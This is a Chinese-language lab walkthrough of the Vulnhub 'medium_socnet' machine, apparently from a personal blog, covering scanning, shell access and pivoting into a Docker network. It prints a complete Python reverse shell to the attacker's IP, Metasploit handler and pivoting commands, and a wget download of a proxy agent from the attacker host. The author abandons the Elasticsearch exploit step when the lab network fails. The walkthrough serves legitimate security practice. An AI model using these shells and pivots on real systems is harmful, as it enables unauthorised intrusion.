漏洞靶场实战-Vuluhub medium_socnet

下载安装

Vulnhub 是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地 VM 打开即可，但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容，所以推荐 VirtualBox

本次复现靶场下载地址

下载的是一个 ovf 后缀的文件，打开 VirtualBox，导入

导入完毕后根据需求编辑虚拟机设置

配置 VB 和 VM 的网络链接

因为 Kali 是在 Vmware 上的，还需要与 VirtualBox 的靶机通信

1.将 VirtulBox 靶机网络配置修改成

实战

1.主机发现

arp-scan -l 

根据 VirtualBox 的 mac 地址也能确定 101 就是靶机

端口扫描与服务发现

nmap -sS -sV -T4 -A -p- 192.168.56.101 

存在一个 ssh 端口和一个 5000 http 服务

Werkzeug 是一个专门用来处理 HTTP 和 WSGI 的工具库，可以方便的在 Python 程序中处理 HTTP 协议相关内容

所以可以判断 5000 端口是一个 python 框架的 web 服务

访问主页，通过插件也可以佐证

2.第一台主机漏洞利用

现在的思路

1.web 信息收集然后漏洞利用1.目录扫描2.Python ssti 漏洞 2.ssh 端口爆破

目录扫描

python .\dirsearch.py -u http://192.168.56.101:5000/ 

是一个代码测试页可以执行代码，尝试反弹 shell，推荐一个反弹 shell 的网站 www.revshells.com/

拿shell

方法一：NC监听

因为这里是直接执行代码，所以使用以下代码即可

import socket,os,subprocess
RHOST='192.168.56.102'# Change it
RPORT=4444# Change it
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# 创建一个TCP-socket对象
s.connect((RHOST,RPORT))    # 连接攻击者
os.dup2(s.fileno(),0)       # 复制链接符
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])# 创建子进程调用SHELL 

在 Kali 上监听 4444 端口，将上面的粘贴到网页代码，点击 test code，接到 shell

执行 whoami 命令还是一个 root 权限用户，但是目录下有个 Dockerfile，推测可能是在 docker 容器中

判断是否是为 docker 环境

1.检查根目录下是否存在.dockerenv文件

也就是说我们现在拿到的是一个 docker 容器内的用户 shell，不是真实的服务器，所以接下来就要尝试横向移动是在不行再容器逃逸

方法二：MSF shell

为了方便操作，这里反弹一个 shell 到 MSF，首先在 kali msf 开启监听（其实就是代替 nc）

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set lhost 192.168.56.102
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > exploit 

靶机还是刚才的脚本就可以，整理好的 msf payloads

这样是实现了 Linux 环境下无文件上线 CS，Windows 的话用 powershell 就行

但是需要注意的是这是一个 Shell Banner 也就是只有一个 shell 不能用 msf 的其他功能，需要将它升级一下

command-shell-to-meterpreter

1.在 shell 中执行 backgroup 命令退回 msf 主页

2.使用命令提升 shell

sessions -u id 

执行完毕后可以看到多了一个 session

还有其他方法：链接

再进入 session 中即可，顺便测试下刚说的 checkcontainer 模块

meterpreter > run post/linux/gather/checkcontainer 

横向移动

**方法一：MSF

1.首先进行信息收集，当然我这里直接用的 msf 的命令，手工的话可以看这篇文章

• 系统信息和路由表信息

run autoroute -s 172.17.0.0/16
run autoroute -p 

新版中可以用 addroute 命令，用法发生了变化，使用这个命令来查看用法

info post/multi/manage/autoroute 

这样的话就添加了一条路由，但是仅这样是不行的，还有添加代理

background 之后使用 socks4a 模块

use auxiliary/server/socks_proxy
set SRVPORT 10044 

我用的是 msf6，msf 的话可以使用

use auxiliary/server/socks4a 

3.修改配置文件

vi /etc/proxychains.conf 

然后进行扫描

proxychains nmap -sT -Pn 10.0.0.2 

但是我这里不知道什么原因失败了，有篇文章介绍到可以上传单文件版 nmap 但是我没有找到 www.anquanke.com/post/id/204…

方法二：工具代理

只能手动使用工具：Venom 进行代理

1.使用命令进行内网探测

for i in $(seq 1 254);do ping -c 1 172.17.0.$i;done 

2.搭建代理

使用这个工具，项目地址：github.com/Dliv3/Venom…

首先在 kali 启动服务端

./admin_linux_x64 -lport 9999 

启动后在 kali 上使用 python 开启临时的 http 服务，然后在目标机器上通过 wget 命令将客户端下载到本地

python -m http.server 8080 

进入 shell 中，执行以下命令

wget http://192.168.56.102:8080/agent_linux_x64
chmod +x agent_linux_x64 
./agent_linux_x64 -rhost 192.168.56.102 -rport 9999#启动客户端 

服务端也连接成功，获取到了一个会话，然后我们进入这个会话，然后开启一个 socks 代理

开启代理后就可以对内网机器进行操作

3.代理工具还是 proxychains，首先修改配置文件

vim /etc/proxychains.conf 

依次探测内网主机

proxychains nmap -sV -sT 172.17.0.3 

3.第二台主机漏洞利用

漏洞发现

发现内网主机 172.17.0.3 发现开放了 9200 端口，elasticsearch 服务，是一个基于 Lucene 的搜索服务器，使用 Java 语言开发的

简单使用命令访问下看看啥回显，找到版本号1.4.2

搜索漏洞

searchsploit    elasticsearch 

通过 MSF 搜索 EXP

use exploit/multi/elasticsearch/search_groovy_script 

确定存在漏洞

漏洞利用

就用第一个脚本，脚本位置在

/usr/share/exploitdb/exploits/linux/remote/36337.py 

proxychains python2 36337.py 172.17.0.3 

又又又遇到问题了，人麻了，而且问题越扯越多，弃坑，用的环境太复杂了，因为我的靶机在 virtualBox 设置的仅主机模式所以不通外网而这里需要请求 dns 直接寄这就是 virutalbox 和 VMware 都用的麻烦，kali 不知道咋回事还巨卡